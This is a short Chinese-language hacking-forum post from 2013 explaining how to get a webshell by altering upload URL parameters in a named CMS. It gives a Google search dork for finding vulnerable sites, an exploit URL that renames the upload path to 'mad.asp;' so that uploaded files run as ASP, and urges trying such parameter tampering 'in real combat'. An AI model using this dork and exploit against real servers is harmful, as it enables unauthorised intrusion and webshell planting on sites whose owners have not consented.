灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2863回复:0

修改url的参数进行突破上传限制拿webshell

楼主#
更多 发布于:2013-02-02 17:09

大家可能都看见过这样的漏洞,这里以疯子的嘉友科技cms上传漏洞为例。

谷歌关键字:inurl:newslist.asp?NodeCode=

exp:

admin/uploadfile.asp?uppath=mad.asp;upname=;uptext=form1.mad.asp

他原上传目录是:/uploadfile.asp?uppath=PicPath;upname=;uptext=form1.PicPath

可以看出对参数PicPath进行了修改,

这种漏洞主要是存在文件名或者路径过滤不严,在实战中多多观察url中的参数,可以尝试进行修改数据。


喜欢0 评分0
游客

返回顶部